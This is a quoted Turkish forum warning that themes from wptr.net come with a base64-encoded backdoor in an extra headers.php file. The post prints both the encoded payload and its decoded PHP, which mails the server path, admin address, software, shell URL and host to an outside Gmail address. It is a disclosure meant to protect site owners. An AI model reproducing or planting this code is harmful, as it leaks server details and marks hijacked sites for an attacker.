Wptr.net isimli sitede wordpress temalarına base encode ile shell ekliyorlar ve bu şekilde dağıtım yapıyorlar. Tema klasörlerinin içerisinde header.php harici, birde headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş.

Casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.
JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>

Şifresiz hali budur.
z��r�^$kime="indirelimhemen@gmail.com";
$baslik="WordPresS Tema Sw Avcisi V3.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn";
mail($kime, $baslik, $EL_MuHaMMeD);

ÖNEMLİ NOT: Temaları dağıtımını yapan sitelerden değilde kim tasarladıysa onun resmi sitesinden indirmeye dikkat edin.

Buda yetmezmiş gibi Shell eklemişler scriptlere Siteleri hacklemek için .. headers.php içine shell kodlarını eklemişler admin
ve db nizi hacklemek adına .. Siz Siz Olun Dikkatli Olun Bunu Açıklayanı pek görmedim Beni Çok Hacklemişlerdi Sizin Başınıza
gelmesin dileklerimle ..

Alıntıdır.